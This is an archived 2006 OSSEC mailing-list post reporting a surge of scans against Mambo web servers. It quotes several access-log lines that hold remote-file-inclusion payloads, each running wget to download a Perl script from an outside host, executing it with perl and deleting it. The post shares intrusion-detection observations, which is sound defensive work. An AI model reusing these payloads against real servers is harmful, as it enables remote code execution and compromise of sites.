[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Ossec-list] High volume of Web (Mambo ?) scans

Subject: [Ossec-list] High volume of Web (Mambo ?) scans
From: daniel.cid at gmail.com (Daniel Cid)
Date: Sun, 14 May 2006 19:46:51 -0300

Since Thursday night I'm seeing a high volume of scans
on different web servers for possibly the following vulns:

http://secunia.com/advisories/14337/
http://www.osvdb.org/displayvuln.php?osvdb_id=10180


However, they say the problem is on function.php and I'm seeing them
on index.php. Can anyone confirm that?
Some log samples:

200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"
217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"
58.26.138.159 - - [12/May/2006:16:03:47 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"
200.80.39.39 - - [12/May/2006:16:27:28 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"
217.160.131.47 - - [12/May/2006:16:29:30 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"
58.26.138.159 - - [12/May/2006:16:36:47 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"
212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"


These are just a few from 15:00 nd 17:00 pm yesterday.
Interesting is that they don't do anything else, just
try to execute it and leave (without searching for
other paths)...  Btw, I'm seeing these alerts from
ossec.

Thanks,

--
Daniel B. Cid
dcid @ ( at ) ossec.net

Prev by Date: [Ossec-list] Version 0.8 of OSSEC HIDS is now available!
Next by Date: [Ossec-list] ossec-list Digest, Vol 7, Issue 7
Previous by thread: [Ossec-list] Version 0.8 of OSSEC HIDS is now available!
Next by thread: [Ossec-list] ossec-list Digest, Vol 7, Issue 7
Index(es):
- Date
- Thread

OSSEC home | Main Index | Thread Index

OSSEC project: www.ossec.net.
Mailling list information: http://www.ossec.net/en/mailing_lists.html.